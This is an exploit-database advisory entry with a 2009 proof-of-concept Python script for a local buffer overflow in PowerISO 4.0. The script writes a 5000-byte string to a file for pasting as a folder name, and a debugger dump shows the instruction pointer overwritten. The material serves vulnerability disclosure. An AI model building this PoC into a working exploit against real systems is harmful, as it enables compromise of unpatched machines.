Poweriso 4.0 Local Buffer Overflow PoC

vendor:

Poweriso

by:

Dr_IDE

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Poweriso

Affected Version From: 4

Affected Version To: 4.7

Patch Exists: YES

Related CWE: N/A

CPE: a:power_software:poweriso

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Poweriso 4.0 Local Buffer Overflow PoC

Poweriso 4.0 is vulnerable to a local buffer overflow vulnerability. This vulnerability can be exploited by creating a new ISO, adding a new folder, pasting to rename the folder, and clicking save. This must have been fixed somewhere between 4.0 and 4.7.

Mitigation:

Upgrade to the latest version of Poweriso.

Source

Exploit-DB raw data:

#!/usr/bin/env python

####################################################################################
#
# Poweriso 4.0 Local Buffer Overflow PoC
# Found By:	Dr_IDE
# Tested On:	XPSP3
# Usage:	Create New ISO, Add a New Folder, Paste to Rename Folder, Click Save
# Notes:	This must have been fixed somewhere between 4.0 and 4.7
#
####################################################################################

'''
EAX 00ADDDC0
ECX 00000000
EDX 00004000
EBX 00000000
ESP 0211FA6C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA~0"
EBP 00000000
ESI 0211FA20
EDI 00ADC2F0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EIP 41414141
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD5000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty +UNORM 3C0A 0012EBE8 00000000
ST1 empty -UNORM F674 00000000 0000000C
ST2 empty 3.3165366670546675450e-4932
ST3 empty 0.0000000000019151440e-4933
ST4 empty 3.3165367202851109490e-4932
ST5 empty +UNORM 0001 0012F674 00000000
ST6 empty +UNORM 000C 000B0418 7E418734
ST7 empty -UNORM ABCD 7E43E577 0012F674
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
'''

# Shellcode must be Alpha Upper

buff = ("\x41" * 5000)

f1 = open("poweriso.txt","w")
f1.write(buff)
f1.close()

# milw0rm.com [2009-09-14]